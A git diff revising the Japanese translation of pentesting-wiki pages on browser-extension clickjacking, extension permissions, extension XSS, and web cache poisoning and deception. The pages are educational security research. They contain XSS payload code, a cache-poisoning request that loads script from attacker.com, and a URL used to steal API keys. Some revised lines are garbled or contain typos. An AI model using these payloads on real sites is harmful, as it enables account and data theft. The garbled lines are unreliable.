+> これらのリソースは、URL **`chrome-extension://[PACKAGE ID]/[PATH]`**を介してウェブページで利用可能になり、これは**`extension.getURL method`**で生成できます。許可されたリソースは適切なCORSヘッダーで提供されるため、XHRなどのメカニズムを介して利用可能です。[1](https://blog.lizzie.io/clickjacking-privacy-badger.html#fn.1)
 
 ブラウザ拡張機能の**`web_accessible_resources`**は、単にウェブを介してアクセス可能なだけでなく、拡張機能の固有の権限で動作します。これは、以下のことが可能であることを意味します：
 
@@ -32,7 +32,7 @@ ClickJackingが何か分からない場合は、以下を確認してくださ
 "icons/*"
 ]
 ```
-この設定は潜在的なセキュリティ問題を引き起こしました。具体的には、ブラウザのPrivacyBadgerアイコンとのインタラクション時にレンダリングされる`skin/popup.html`ファイルが`iframe`内に埋め込まれる可能性があります。この埋め込みは、ユーザーを騙して「このウェブサイトのPrivacyBadgerを無効にする」を誤ってクリックさせるために悪用される可能性があります。このような行動は、PrivacyBadgerの保護を無効にし、ユーザーをより多くのトラッキングにさらすことで、ユーザーのプライバシーを侵害します。このエクスプロイトの視覚的デモは、[**https://blog.lizzie.io/clickjacking-privacy-badger/badger-fade.webm**](https://blog.lizzie.io/clickjacking-privacy-badger/badger-fade.webm)で提供されているClickJackingのビデオ例で見ることができます。
+この設定は潜在的なセキュリティ問題を引き起こしました。具体的には、ブラウザのPrivacyBadgerアイコンとのインタラクション時にレンダリングされる`skin/popup.html`ファイルが`iframe`内に埋め込まれる可能性があります。この埋め込みは、ユーザーを欺いて「このウェブサイトのPrivacyBadgerを無効にする」を誤ってクリックさせるために悪用される可能性があります。このような行動は、PrivacyBadgerの保護を無効にし、ユーザーを追跡の増加にさらすことで、ユーザーのプライバシーを侵害します。このエクスプロイトの視覚的デモは、[**https://blog.lizzie.io/clickjacking-privacy-badger/badger-fade.webm**](https://blog.lizzie.io/clickjacking-privacy-badger/badger-fade.webm)で提供されているClickJackingビデオ例で見ることができます。
 
 この脆弱性に対処するために、簡単な解決策が実施されました：`web_accessible_resources`のリストから`/skin/*`を削除しました。この変更により、`skin/`ディレクトリのコンテンツにウェブアクセス可能なリソースを通じてアクセスまたは操作できないようにすることで、リスクが効果的に軽減されました。
 
@@ -75,11 +75,11 @@ src="chrome-extension://ablpimhddhnaldgkfbpafchflffallca/skin/popup.html">
 ```
 ## Metamaskの例
 
-A [**blog post about a ClickJacking in metamask can be found here**](https://slowmist.medium.com/metamask-clickjacking-vulnerability-analysis-f3e7c22ff4d9)。この場合、Metamaskは、アクセスに使用されるプロトコルが**`https:`**または**`http:`**であることを確認することで脆弱性を修正しました（例えば**`chrome:`**ではありません）：
+A [**blog post about a ClickJacking in metamask can be found here**](https://slowmist.medium.com/metamask-clickjacking-vulnerability-analysis-f3e7c22ff4d9)。この場合、Metamaskは、アクセスに使用されるプロトコルが**`https:`**または**`http:`**（例えば**`chrome:`**ではない）であることを確認することで脆弱性を修正しました：
 
 <figure><img src="../../images/image (21).png" alt=""><figcaption></figcaption></figure>
 
-**Metamask拡張機能で修正された別のClickJacking**は、ユーザーがページがフィッシングの疑いがある場合に**ホワイトリストに追加するためにクリック**できたことです。これは`“web_accessible_resources”: [“inpage.js”, “phishing.html”]`によるものでした。そのページはClickjackingに対して脆弱であったため、攻撃者は被害者が気づかずにホワイトリストに追加するようにクリックさせるために、何か普通のものを表示して悪用することができ、その後フィッシングページに戻ることができました。
+**Metamask拡張機能で修正された別のClickJacking**は、ユーザーが`“web_accessible_resources”: [“inpage.js”, “phishing.html”]`のためにフィッシングの疑いがあるページで**Click to whitelist**できたことです。そのページはClickjackingに対して脆弱であったため、攻撃者は被害者が気づかずにホワイトリストに追加するようにクリックさせるために、何か普通のものを表示して利用することができ、その後フィッシングページに戻ることができました。
 
 ## Steam Inventory Helperの例
 
diff --git a/src/pentesting-web/browser-extension-pentesting-methodology/browext-permissions-and-host_permissions.md b/src/pentesting-web/browser-extension-pentesting-methodology/browext-permissions-and-host_permissions.md
index 17d6ddf5b..7682afc2e 100644
--- a/src/pentesting-web/browser-extension-pentesting-methodology/browext-permissions-and-host_permissions.md
+++ b/src/pentesting-web/browser-extension-pentesting-methodology/browext-permissions-and-host_permissions.md
@@ -14,7 +14,7 @@ Permissionsは拡張機能の**`manifest.json`**ファイルで**`permissions`**
 
 <figure><img src="../../images/image (18).png" alt=""><figcaption></figcaption></figure>
 
-[**Chromiumブラウザ拡張機能が要求できる権限の完全なリストはこちら**](https://developer.chrome.com/docs/extensions/develop/concepts/declare-permissions#permissions)と、[**Firefox拡張機能の完全なリストはこちら**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/manifest.json/permissions#api_permissions)**。**
+[**Chromiumブラウザ拡張機能が要求できる権限の完全なリストはこちら**](https://developer.chrome.com/docs/extensions/develop/concepts/declare-permissions#permissions)で見つけることができ、[**Firefox拡張機能の完全なリストはこちら**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/manifest.json/permissions#api_permissions)**です。**
 
 ### `host_permissions`
 
@@ -66,7 +66,7 @@ Permissionsは拡張機能の**`manifest.json`**ファイルで**`permissions`**
 > [!CAUTION]
 > 拡張は、いつでも任意の数のタブを作成できます。
 
-`tabs.create()` の可能なパラメータを確認すると、その機能が `window.open()` が制御できる範囲をはるかに超えていることに気付くでしょう。そして、FirefoxはこのAPIで `data:` URI の使用を許可していませんが、Chromeにはそのような保護がありません。**このようなURIのトップレベルでの使用は** [**フィッシングの悪用のために禁止されています**](https://bugzilla.mozilla.org/show_bug.cgi?id=1331351)**。**
+`tabs.create()` の可能なパラメータを確認すると、その機能が `window.open()` が制御できる範囲をはるかに超えていることに気付くでしょう。そして、FirefoxはこのAPIで `data:` URI の使用を許可していませんが、Chromeにはそのような保護がありません。**このようなURIのトップレベルでの使用は、** [**フィッシングに悪用されたため禁止されています**](https://bugzilla.mozilla.org/show_bug.cgi?id=1331351)**。**
 
 [**tabs.update()**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs/update) は `tabs.create()` に非常に似ていますが、**既存のタブを修正します。** したがって、悪意のある拡張は、例えば任意の広告ページをあなたのタブの1つに読み込むことができ、対応するタブをアクティブにすることもできます。
 
@@ -75,19 +75,19 @@ Permissionsは拡張機能の**`manifest.json`**ファイルで**`permissions`**
 ウェブサイトが特別な権限を要求できることはご存知でしょう。例えば、ウェブカメラ（ビデオ会議ツール）や地理的位置（地図）にアクセスするためです。これは悪用の可能性が大きい機能であり、ユーザーは毎回これを確認する必要があります。
 
 > [!CAUTION]
-> ブラウザ拡張ではそうではありません。**ブラウザ拡張が** [**ウェブカメラやマイクへのアクセスを要求する場合**](https://developer.mozilla.org/en-US/docs/Web/API/MediaDevices/getUserMedia)**、一度だけ許可を求める必要があります。**
+> ブラウザ拡張ではそうではありません。**ブラウザ拡張が** [**ウェブカメラやマイクへのアクセスを要求する場合**](https://developer.mozilla.org/en-US/docs/Web/API/MediaDevices/getUserMedia)**、一度だけ権限を求める必要があります。**
 
-通常、拡張はインストール直後にこれを行います。このプロンプトが受け入れられると、**ウェブカメラへのアクセスはいつでも可能**になり、ユーザーがこの時点で拡張と対話していなくても可能です。はい、ユーザーは拡張が本当にウェブカメラへのアクセスを必要とする場合にのみこのプロンプトを受け入れます。しかし、その後は拡張が何かを秘密裏に録画しないことを信頼しなければなりません。
+通常、拡張はインストール直後にこれを行います。このプロンプトが受け入れられると、**ウェブカメラへのアクセスはいつでも可能になります。** ユーザーがこの時点で拡張と対話していなくてもです。はい、ユーザーは拡張が本当にウェブカメラへのアクセスを必要とする場合にのみこのプロンプトを受け入れます。しかし、その後は拡張が何かを秘密裏に録画しないことを信頼しなければなりません。
 
-[あなたの正確な地理的位置](https://developer.mozilla.org/en-US/docs/Web/API/Geolocation) や [クリップボードの内容](https://developer.mozilla.org/en-US/docs/Web/API/Clipboard_API) へのアクセスがある場合、明示的に許可を与える必要はまったくありません。**拡張は単に `geolocation` または `clipboard` を** [**permissions entry**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/manifest.json/permissions) **に追加します。** これらのアクセス権は、拡張がインストールされるときに暗黙的に付与されます。したがって、これらの特権を持つ悪意のあるまたは侵害された拡張は、あなたが何も気づかないうちにあなたの移動プロファイルを作成したり、コピーされたパスワードのためにクリップボードを監視したりすることができます。
+[あなたの正確な地理的位置](https://developer.mozilla.org/en-US/docs/Web/API/Geolocation) や [クリップボードの内容](https://developer.mozilla.org/en-US/docs/Web/API/Clipboard_API) へのアクセスについては、明示的に権限を付与する必要はまったくありません。**拡張は単に `geolocation` または `clipboard` を** [**permissions entry**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/manifest.json/permissions) **に追加します。** これらのアクセス権は、拡張がインストールされるときに暗黙的に付与されます。したがって、これらの特権を持つ悪意のあるまたは侵害された拡張は、あなたが何も気づかないうちにあなたの移動プロファイルを作成したり、コピーされたパスワードのためにクリップボードを監視したりすることができます。
 
 **`history`** キーワードを拡張マニフェストの [permissions entry](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/manifest.json/permissions) に追加すると、**[history API](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/history)** へのアクセスが付与されます。これにより、ユーザーの全ブラウジング履歴を一度に取得でき、ユーザーがこれらのウェブサイトを再度訪れるのを待つ必要がありません。
 
-**`bookmarks`** **権限** も同様の悪用の可能性があり、これにより**[bookmarks API](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/bookmarks)** を介してすべてのブックマークを読み取ることができます。
+**`bookmarks`** **権限** も同様の悪用の可能性があり、これにより**すべてのブックマークを** [**bookmarks API**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/bookmarks) **を介して読み取ることができます。**
 
 ### ストレージ権限 <a href="#the-storage-permission" id="the-storage-permission"></a>
 
-拡張のストレージは、非常に似たキー-バリューコレクションであり、[localStorage](https://developer.mozilla.org/en-US/docs/Web/API/Window/localStorage) を使用できる任意のウェブサイトと非常に似ています。したがって、ここに機密情報を保存すべきではありません。
+拡張のストレージは、非常に似たキーと値のコレクションであり、[localStorage](https://developer.mozilla.org/en-US/docs/Web/API/Window/localStorage) を使用できる任意のウェブサイトと非常に似ています。したがって、ここに機密情報を保存すべきではありません。
 
 しかし、広告会社もこのストレージを悪用する可能性があります。
 
@@ -97,9 +97,9 @@ Permissionsは拡張機能の**`manifest.json`**ファイルで**`permissions`**
 
 ## 予防 <a href="#why-not-restrict-extension-privileges" id="why-not-restrict-extension-privileges"></a>
 
-Googleの開発者のポリシーは、拡張がその機能に必要な以上の特権を要求することを明示的に禁止しており、過剰な権限要求を効果的に軽減しています。ブラウザ拡張がこの境界を越えた例は、アドオンストアではなくブラウザ自体に付属して配布されたことです。
+Googleの開発者のポリシーは、拡張が機能に必要な以上の特権を要求することを明示的に禁止しており、過剰な権限要求を効果的に軽減しています。ブラウザ拡張がこの境界を越えた例は、アドオンストアではなくブラウザ自体に付属して配布されたことです。
 
-ブラウザは、拡張特権の悪用をさらに抑制できます。例えば、Chromeの [tabCapture](https://developer.chrome.com/docs/extensions/reference/tabCapture/) および [desktopCapture](https://developer.chrome.com/docs/extensions/reference/desktopCapture/) APIは、画面録画に使用され、悪用を最小限に抑えるように設計されています。tabCapture APIは、拡張アイコンをクリックするなどの直接的なユーザー操作を通じてのみアクティブ化でき、desktopCaptureは録画するウィンドウのユーザー確認を必要とし、秘密裏の録画活動を防ぎます。
+ブラウザは、拡張特権の悪用をさらに抑制できます。例えば、Chromeの [tabCapture](https://developer.chrome.com/docs/extensions/reference/tabCapture/) および [desktopCapture](https://developer.chrome.com/docs/extensions/reference/desktopCapture/) APIは、画面録画に使用され、悪用を最小限に抑えるように設計されています。tabCapture APIは、拡張アイコンをクリックするなどの直接的なユーザーの操作を通じてのみアクティブ化でき、desktopCaptureは録画するウィンドウのユーザー確認を必要とし、秘密裏の録画活動を防ぎます。
 
 しかし、セキュリティ対策を強化すると、拡張の柔軟性とユーザーフレンドリーさが低下することがよくあります。[activeTab permission](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/manifest.json/permissions#activetab_permission) はこのトレードオフを示しています。これは、拡張がインターネット全体にわたってホスト特権を要求する必要を排除するために導入され、ユーザーによって明示的にアクティブ化された場合にのみ、拡張が現在のタブにアクセスできるようにします。このモデルは、ユーザーが開始するアクションを必要とする拡張には効果的ですが、自動または事前のアクションを必要とする拡張には不十分であり、便利さと即時の応答性を損ないます。
 
diff --git a/src/pentesting-web/browser-extension-pentesting-methodology/browext-xss-example.md b/src/pentesting-web/browser-extension-pentesting-methodology/browext-xss-example.md
index 132f07a14..6edc167e7 100644
--- a/src/pentesting-web/browser-extension-pentesting-methodology/browext-xss-example.md
+++ b/src/pentesting-web/browser-extension-pentesting-methodology/browext-xss-example.md
@@ -2,9 +2,9 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Iframeを通じたクロスサイトスクリプティング (XSS)
+## Iframeを通じたクロスサイトスクリプティング（XSS）
 
-このセットアップでは、**コンテンツスクリプト**が実装され、Iframeをインスタンス化し、Iframeのソースとしてクエリパラメータを含むURLを組み込んでいます:
+このセットアップでは、**コンテンツスクリプト**が実装され、Iframeをインスタンス化し、Iframeのソースとしてクエリパラメータを含むURLを組み込んでいます：
 ```javascript
 chrome.storage.local.get("message", (result) => {
 let constructedURL =
@@ -40,7 +40,7 @@ let maliciousURL = `${baseURL}?content=${encodeURIComponent(xssPayload)}`
 document.querySelector("iframe").src = maliciousURL
 }, 1000)
 ```
-過度に許可されたコンテンツセキュリティポリシーは、次のようになります:
+過度に許可されたコンテンツセキュリティポリシーは、次のようになります：
 ```json
 "content_security_policy": "script-src 'self' 'unsafe-eval'; object-src 'self';"
 ```
@@ -56,7 +56,7 @@ document.body.append(newFrame)
 ```
 ## DOMベースのXSS + ClickJacking
 
-この例は、[元の投稿の要約](https://thehackerblog.com/steam-fire-and-paste-a-story-of-uxss-via-dom-xss-clickjacking-in-steam-inventory-helper/)から取られました。
+この例は[元の投稿の要約](https://thehackerblog.com/steam-fire-and-paste-a-story-of-uxss-via-dom-xss-clickjacking-in-steam-inventory-helper/)から取られました。
 
 コアの問題は、**`/html/bookmarks.html`**にあるDOMベースのクロスサイトスクリプティング（XSS）脆弱性から生じます。問題のあるJavaScriptは、**`bookmarks.js`**の一部で、以下に詳述されています：
 ```javascript
@@ -80,9 +80,9 @@ persistData()
 ```
 このスニペットは、**`txtName`** 入力フィールドから **値** を取得し、**文字列連結を使用してHTMLを生成** し、それをjQueryの `.append()` 関数を使用してDOMに追加します。
 
-通常、Chrome拡張機能のコンテンツセキュリティポリシー (CSP) は、そのような脆弱性を防ぎます。しかし、**‘unsafe-eval’ によるCSPの緩和** と jQueryのDOM操作メソッドの使用（これらはDOM挿入時にスクリプトを [`eval()`](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/eval) に渡すために [`globalEval()`](https://api.jquery.com/jquery.globaleval/) を使用します）により、悪用は依然として可能です。
+通常、Chrome拡張機能のコンテンツセキュリティポリシー (CSP) はそのような脆弱性を防ぎます。しかし、**‘unsafe-eval’ によるCSPの緩和** と jQueryのDOM操作メソッドの使用（これらはDOM挿入時にスクリプトを [`eval()`](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/eval) に渡すために [`globalEval()`](https://api.jquery.com/jquery.globaleval/) を使用します）により、悪用は依然として可能です。
 
-この脆弱性は重要ですが、その悪用は通常、ユーザーの操作に依存します：ページを訪問し、XSSペイロードを入力し、「追加」ボタンをアクティブにします。
+この脆弱性は重要ですが、その悪用は通常ユーザーの操作に依存します：ページを訪問し、XSSペイロードを入力し、「追加」ボタンをアクティブにします。
 
 この脆弱性を強化するために、二次的な **clickjacking** 脆弱性が悪用されます。Chrome拡張機能のマニフェストは、広範な `web_accessible_resources` ポリシーを示しています：
 ```json
@@ -94,9 +94,9 @@ persistData()
 [...]
 ],
 ```
-特に、**`/html/bookmarks.html`** ページはフレーミングに対して脆弱であり、したがって**clickjacking**に対しても脆弱です。この脆弱性は、攻撃者のサイト内でページをフレーム化し、DOM要素でオーバーレイしてインターフェースを巧妙に再設計するために利用されます。この操作により、被害者は意図せずに基盤となる拡張機能と対話することになります。
+特に、**`/html/bookmarks.html`** ページはフレーミングに対して脆弱であり、したがって **clickjacking** に対しても脆弱です。この脆弱性は、攻撃者のサイト内でページをフレーム化し、DOM要素でオーバーレイしてインターフェースを巧妙に再設計するために利用されます。この操作により、被害者は意図せずに基盤となる拡張機能と対話することになります。
 
-## References
+## 参考文献
 
 - [https://palant.info/2022/08/31/when-extension-pages-are-web-accessible/](https://palant.info/2022/08/31/when-extension-pages-are-web-accessible/)
 - [https://thehackerblog.com/steam-fire-and-paste-a-story-of-uxss-via-dom-xss-clickjacking-in-steam-inventory-helper/](https://thehackerblog.com/steam-fire-and-paste-a-story-of-uxss-via-dom-xss-clickjacking-in-steam-inventory-helper/)
diff --git a/src/pentesting-web/cache-deception/README.md b/src/pentesting-web/cache-deception/README.md
index c40a8741b..265733133 100644
--- a/src/pentesting-web/cache-deception/README.md
+++ b/src/pentesting-web/cache-deception/README.md
@@ -21,11 +21,11 @@
 
 ### 発見：HTTPヘッダーを確認
 
-通常、**キャッシュに保存された**応答には、**それを示すヘッダー**があります。この投稿で注意すべきヘッダーを確認できます：[**HTTPキャッシュヘッダー**](../../network-services-pentesting/pentesting-web/special-http-headers.md#cache-headers)。
+通常、**キャッシュに保存された**応答には、**それを示すヘッダーが存在します**。どのヘッダーに注意を払うべきかは、この投稿で確認できます：[**HTTPキャッシュヘッダー**](../../network-services-pentesting/pentesting-web/special-http-headers.md#cache-headers)。
 
 ### 発見：キャッシュエラーコード
 
-応答がキャッシュに保存されていると考えている場合、**不正なヘッダーでリクエストを送信**してみると、**ステータスコード400**で応答されるはずです。その後、リクエストに通常アクセスして、**応答が400ステータスコード**であれば、それが脆弱であることがわかります（さらにはDoS攻撃を実行することも可能です）。
+応答がキャッシュに保存されていると考えている場合、**不正なヘッダーでリクエストを送信**してみることができます。これには、**ステータスコード400**で応答されるべきです。その後、リクエストに通常アクセスして、**応答が400ステータスコードであれば**、それが脆弱であることがわかります（さらにはDoS攻撃を実行することも可能です）。
 
 さらにオプションを見つけることができます：
 
@@ -43,20 +43,20 @@ cache-poisoning-to-dos.md
 ```
 ### バックエンドサーバーから有害な応答を引き出す
 
-パラメータ/ヘッダーが特定されたら、それがどのように**サニタイズ**されているか、**どこで**応答に**反映**されているか、または影響を与えているかを確認します。これを悪用することはできますか（XSSを実行するか、あなたが制御するJSコードを読み込むか？ DoSを実行するか？...）
+パラメータ/ヘッダーが特定されたら、それがどのように**サニタイズ**されているか、**どこで**応答に**反映**されているか、または影響を与えているかを確認します。これを悪用することはできますか（XSSを実行する、またはあなたが制御するJSコードを読み込む？ DoSを実行する？...）
 
 ### 応答をキャッシュさせる
 
-悪用できる**ページ**、使用する**パラメータ**/**ヘッダー**、およびそれを**悪用する方法**を**特定**したら、ページをキャッシュさせる必要があります。キャッシュに取得しようとしているリソースによっては、これには時間がかかる場合があり、数秒間試みる必要があるかもしれません。
+悪用できる**ページ**、使用する**パラメータ**/**ヘッダー**、および**悪用方法**を**特定**したら、ページをキャッシュさせる必要があります。キャッシュに取得しようとしているリソースによっては、これには時間がかかる場合があり、数秒間試みる必要があるかもしれません。
 
 応答のヘッダー**`X-Cache`**は非常に便利で、リクエストがキャッシュされていない場合は**`miss`**の値を持ち、キャッシュされている場合は**`hit`**の値を持つ可能性があります。\
 ヘッダー**`Cache-Control`**も、リソースがキャッシュされているかどうか、次にリソースが再キャッシュされるのはいつかを知るために興味深いです: `Cache-Control: public, max-age=1800`
 
-もう一つの興味深いヘッダーは**`Vary`**です。このヘッダーは、通常はキーがない場合でも、**キャッシュキーの一部**として扱われる**追加のヘッダー**を**示すため**に使用されることがよくあります。したがって、ターゲットとしている被害者の`User-Agent`を知っている場合、特定の`User-Agent`を使用しているユーザーのためにキャッシュを汚染することができます。
+もう一つの興味深いヘッダーは**`Vary`**です。このヘッダーは、通常はキーがない場合でも、**キャッシュキーの一部**として扱われる**追加のヘッダー**を**示すため**にしばしば使用されます。したがって、ターゲットとしている被害者の`User-Agent`を知っている場合、特定の`User-Agent`を使用するユーザーのためにキャッシュを汚染することができます。
 
 キャッシュに関連するもう一つのヘッダーは**`Age`**です。これは、オブジェクトがプロキシキャッシュに存在している秒数を定義します。
 
-リクエストをキャッシュする際は、使用するヘッダーに**注意してください**。なぜなら、いくつかのヘッダーは**予期せず**に**キーとして使用される**可能性があり、**被害者はその同じヘッダーを使用する必要がある**からです。常に**異なるブラウザ**でキャッシュポイズニングを**テスト**して、機能しているか確認してください。
+リクエストをキャッシュする際は、使用するヘッダーに**注意してください**。なぜなら、いくつかのヘッダーは**予期せず**に**キー付き**として使用される可能性があり、**被害者はその同じヘッダーを使用する必要がある**からです。常に**異なるブラウザ**でキャッシュポイズニングを**テスト**して、機能しているか確認してください。
 
 ## 悪用の例
 
@@ -97,7 +97,7 @@ cache-poisoning-via-url-discrepancies.md
 
 ### APIキーを盗むためのパストラバーサルによるキャッシュポイズニング <a href="#using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities" id="using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities"></a>
 
-[**この解説は**](https://nokline.github.io/bugbounty/2024/02/04/ChatGPT-ATO.html) `https://chat.openai.com/share/%2F..%2Fapi/auth/session?cachebuster=123` のようなURLを使用してOpenAI APIキーを盗むことが可能だった理由を説明しています。`/share/*` に一致するものはすべてキャッシュされ、リクエストがウェブサーバーに到達したときにCloudflareがURLを正規化しなかったためです。
+[**このレポートは**](https://nokline.github.io/bugbounty/2024/02/04/ChatGPT-ATO.html) `https://chat.openai.com/share/%2F..%2Fapi/auth/session?cachebuster=123` のようなURLを使用してOpenAI APIキーを盗むことが可能だった理由を説明しています。`/share/*` に一致するものはすべてキャッシュされ、CloudflareがURLを正規化することはなく、リクエストがウェブサーバーに到達したときに行われました。
 
 これは以下でもより詳しく説明されています：
 
@@ -107,7 +107,7 @@ cache-poisoning-via-url-discrepancies.md
 
 ### 複数のヘッダーを使用してウェブキャッシュポイズニングの脆弱性を悪用する <a href="#using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities" id="using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities"></a>
 
-時には、キャッシュを悪用するために**複数のキーなし入力を悪用する必要があります**。例えば、`X-Forwarded-Host`をあなたが管理するドメインに設定し、`X-Forwarded-Scheme`を`http`に設定すると、**オープンリダイレクト**を見つけることができるかもしれません。**もし**サーバーがすべての**HTTP**リクエストを**HTTPS**に**転送**し、リダイレクトのドメイン名としてヘッダー`X-Forwarded-Scheme`を使用している場合、リダイレクトによってページが指す場所を制御できます。
+時には、キャッシュを悪用するために**複数のキーなし入力を悪用する必要があります**。例えば、`X-Forwarded-Host`をあなたが制御するドメインに設定し、`X-Forwarded-Scheme`を`http`に設定すると、**オープンリダイレクト**を見つけることができるかもしれません。**もし**サーバーがすべての**HTTP**リクエストを**HTTPS**に**転送**し、リダイレクトのドメイン名としてヘッダー`X-Forwarded-Scheme`を使用している場合、リダイレクトによってページが指す場所を制御できます。
 ```markup
 GET /resources/js/tracking.js HTTP/1.1
 Host: acc11fe01f16f89c80556c2b0056002e.web-security-academy.net
@@ -125,7 +125,7 @@ X-Host: attacker.com
 ```
 ### Fat Get
 
-URLとボディの両方にリクエストを含むGETリクエストを送信します。ウェブサーバーがボディのリクエストを使用する場合でも、キャッシュサーバーがURLのリクエストをキャッシュする場合、URLにアクセスする誰もが実際にはボディのパラメータを使用します。James KettleがGithubウェブサイトで発見した脆弱性のように:
+URLとボディの両方にリクエストを含むGETリクエストを送信します。ウェブサーバーがボディのリクエストを使用する場合でも、キャッシュサーバーがURLのリクエストをキャッシュする場合、URLにアクセスする誰もが実際にはボディからのパラメータを使用します。James KettleがGithubウェブサイトで発見した脆弱性のように:
 ```
 GET /contact/report-abuse?report=albinowax HTTP/1.1
 Host: github.com
@@ -138,17 +138,17 @@ There it a portswigger lab about this: [https://portswigger.net/web-security/web
 
 ### パラメータクロッキング
 
-例えば、**パラメータ**を**`;`**文字を使って**`&`**の代わりに分離することが可能です。これを利用して、キーのないパラメータの値をキーのあるものの中に入れ、悪用することができます。
+例えば、**パラメータ**を**`&`**の代わりに**`;`**文字を使用してrubyサーバーで分離することが可能です。これを利用して、キーのないパラメータの値をキーのあるものの中に入れ、悪用することができます。
 
 Portswigger lab: [https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-param-cloaking](https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-param-cloaking)
 
-### HTTPリクエストスムージングを悪用したHTTPキャッシュポイズニングの悪用
+### HTTPキャッシュポイズニングをHTTPリクエストスマグリングを悪用して攻撃する
 
-[Cache Poisoning attacks by abusing HTTP Request Smuggling](../http-request-smuggling/#using-http-request-smuggling-to-perform-web-cache-poisoning)の実施方法について学びましょう。
+[Cache Poisoning attacks by abusing HTTP Request Smuggling](../http-request-smuggling/#using-http-request-smuggling-to-perform-web-cache-poisoning)の実施方法についてここで学びます。
 
 ### Web Cache Poisoningの自動テスト
 
-[Web Cache Vulnerability Scanner](https://github.com/Hackmanit/Web-Cache-Vulnerability-Scanner)を使用して、Webキャッシュポイズニングを自動的にテストできます。多くの異なる技術をサポートしており、高度にカスタマイズ可能です。
+[Web Cache Vulnerability Scanner](https://github.com/Hackmanit/Web-Cache-Vulnerability-Scanner)を使用して、Webキャッシュポイズニングの自動テストを行うことができます。多くの異なる技術をサポートしており、高度にカスタマイズ可能です。
 
 使用例: `wcvs -u example.com`
 
@@ -172,15 +172,15 @@ Ruby on Railsアプリケーションでは、Rackミドルウェアがよく利
 
 ### 403とストレージバケット
 
-Cloudflareは以前、403レスポンスをキャッシュしていました。誤ったAuthorizationヘッダーでS3またはAzure Storage Blobsにアクセスしようとすると、キャッシュされた403レスポンスが返されました。Cloudflareは403レスポンスのキャッシュを停止しましたが、この動作は他のプロキシサービスにまだ存在する可能性があります。
+Cloudflareは以前、403レスポンスをキャッシュしていました。誤ったAuthorizationヘッダーでS3またはAzure Storage Blobsにアクセスしようとすると、403レスポンスがキャッシュされました。Cloudflareは403レスポンスのキャッシュを停止しましたが、この動作は他のプロキシサービスにまだ存在する可能性があります。
 
 ### キー付きパラメータの注入
 
-キャッシュはしばしばキャッシュキーに特定のGETパラメータを含めます。例えば、FastlyのVarnishはリクエストの`size`パラメータをキャッシュしました。しかし、パラメータのURLエンコードされたバージョン（例:`siz%65`）が誤った値で送信された場合、キャッシュキーは正しい`size`パラメータを使用して構築されます。しかし、バックエンドはURLエンコードされたパラメータの値を処理します。2番目の`size`パラメータをURLエンコードすると、キャッシュによって省略されますが、バックエンドでは利用されます。このパラメータに0の値を割り当てると、キャッシュ可能な400 Bad Requestエラーが発生しました。
+キャッシュはしばしばキャッシュキーに特定のGETパラメータを含めます。例えば、FastlyのVarnishはリクエストの`size`パラメータをキャッシュしました。しかし、パラメータのURLエンコードされたバージョン（例:`siz%65`）が誤った値で送信された場合、キャッシュキーは正しい`size`パラメータを使用して構築されます。しかし、バックエンドはURLエンコードされたパラメータの値を処理します。2番目の`size`パラメータをURLエンコードすると、キャッシュによって省略されますが、バックエンドによって利用されます。このパラメータに0の値を割り当てると、キャッシュ可能な400 Bad Requestエラーが発生しました。
 
 ### ユーザーエージェントルール
 
-一部の開発者は、サーバーの負荷を管理するために、FFUFやNucleiのような高トラフィックツールのユーザーエージェントに一致するリクエストをブロックします。皮肉なことに、このアプローチはキャッシュポイズニングやDoSなどの脆弱性を引き起こす可能性があります。
+一部の開発者は、サーバーの負荷を管理するために、FFUFやNucleiなどの高トラフィックツールのユーザーエージェントに一致するリクエストをブロックします。皮肉なことに、このアプローチはキャッシュポイズニングやDoSなどの脆弱性を引き起こす可能性があります。
 
 ### 不正なヘッダーフィールド
 
@@ -192,9 +192,9 @@ Cloudflareは以前、403レスポンスをキャッシュしていました。
 
 ## キャッシュデセプション
 
-キャッシュデセプションの目的は、クライアントに**機密情報を持つリソースをキャッシュに保存させること**です。
+キャッシュデセプションの目的は、クライアントに**キャッシュによって保存されるリソースをその機密情報で読み込ませる**ことです。
 
-まず、**拡張子**（例：`.css`、`.js`、`.png`など）が通常**キャッシュに保存されるように**設定されていることに注意してください。したがって、`www.example.com/profile.php/nonexistent.js`にアクセスすると、キャッシュはおそらくレスポンスを保存します。なぜなら、`.js`**拡張子**を見ているからです。しかし、**アプリケーション**が**機密**ユーザーコンテンツを_www.example.com/profile.php_から再生している場合、他のユーザーからそのコンテンツを**盗む**ことができます。
+まず、**拡張子**（例：`.css`、`.js`、`.png`など）が通常**キャッシュに保存されるように**設定されていることに注意してください。したがって、`www.example.com/profile.php/nonexistent.js`にアクセスすると、キャッシュはおそらく`.js`**拡張子**を見てレスポンスを保存します。しかし、**アプリケーション**が_swww.example.com/profile.php_に保存された**機密**ユーザーコンテンツで**再生**している場合、他のユーザーからそのコンテンツを**盗む**ことができます。
 
 他にテストすること:
 
@@ -203,15 +203,15 @@ Cloudflareは以前、403レスポンスをキャッシュしていました。
 - _www.example.com/profile.php/test.js_
 - _www.example.com/profile.php/../test.js_
 - _www.example.com/profile.php/%2e%2e/test.js_
-- _あまり知られていない拡張子（例：_`.avif`_）を使用する_
+- _あまり知られていない拡張子を使用する（例：`.avif`）_
 
 非常に明確な例は、この書き込みに見つけることができます: [https://hackerone.com/reports/593712](https://hackerone.com/reports/593712)。\
